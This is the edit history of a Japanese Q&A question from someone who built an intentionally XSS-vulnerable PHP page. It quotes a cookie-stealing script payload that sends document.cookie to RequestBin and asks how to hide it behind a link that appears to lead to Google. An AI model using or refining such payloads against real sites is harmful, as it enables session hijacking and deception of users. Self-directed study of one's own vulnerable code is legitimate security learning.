質問編集履歴
2
誤字
test
CHANGED
|
File without changes
|
test
CHANGED
|
@@ -14,7 +14,7 @@
|
|
|
14
14
|
|
|
15
15
|
しかし、理想としては`<a href=http://google.com>googleのURLです</a>`のようにリンクを準備して、リンクを踏むとgoogle.comにしっかりと遷移するが、kookie情報はrequestbinに送られるような、リンクを作成したいです。
|
|
16
16
|
|
|
17
|
-
つまり、`<a href=http://google.com>googleのURLです</a>`と`<script>window.location='requestbinのurl?'.concat(document.cookie)</script>`を組み合わせて`googleのURLです`というリンクをクリックするとcookie情報を奪うようなリンクを作成したいということです。
|
|
17
|
+
つまり、`<a href=http://google.com>googleのURLです</a>`と`<script>window.location='requestbinのurl?'.concat(document.cookie)</script>`を組み合わせて`googleのURLです`というリンクをクリックするとgoogle.comに遷移してかつcookie情報を奪うようなリンクを作成したいということです。
|
|
18
18
|
|
|
19
19
|
|
|
20
20
|
|
1
誤字
test
CHANGED
|
File without changes
|
test
CHANGED
|
@@ -6,15 +6,15 @@
|
|
|
6
6
|
|
|
7
7
|
今、下記のようにXSSに対する脆弱性があるphpのコードを作りました。UIは下記画像の通りです。
|
|
8
8
|
|
|
9
|
-
今RequestBinに
|
|
9
|
+
今RequestBinにcookieの情報を送信するスクリプトをコメント欄に埋め込むことを想定しています。
|
|
10
10
|
|
|
11
11
|
埋め込むスクリプトとしては`<script>window.location='requestbinのurl?'.concat(document.cookie)</script>`です。
|
|
12
12
|
|
|
13
|
-
このスクリプトをコメント欄に直接埋め込むと問題なくrequestbinに
|
|
13
|
+
このスクリプトをコメント欄に直接埋め込むと問題なくrequestbinにcookie情報が保存されておりXSS攻撃は成功しています。
|
|
14
14
|
|
|
15
15
|
しかし、理想としては`<a href=http://google.com>googleのURLです</a>`のようにリンクを準備して、リンクを踏むとgoogle.comにしっかりと遷移するが、kookie情報はrequestbinに送られるような、リンクを作成したいです。
|
|
16
16
|
|
|
17
|
-
つまり、`<a href=http://google.com>googleのURLです</a>`と`<script>window.location='requestbinのurl?'.concat(document.cookie)</script>`を組み合わせて`googleのURLです`というリンクをクリックすると
|
|
17
|
+
つまり、`<a href=http://google.com>googleのURLです</a>`と`<script>window.location='requestbinのurl?'.concat(document.cookie)</script>`を組み合わせて`googleのURLです`というリンクをクリックするとcookie情報を奪うようなリンクを作成したいということです。
|
|
18
18
|
|
|
19
19
|
|
|
20
20
|
|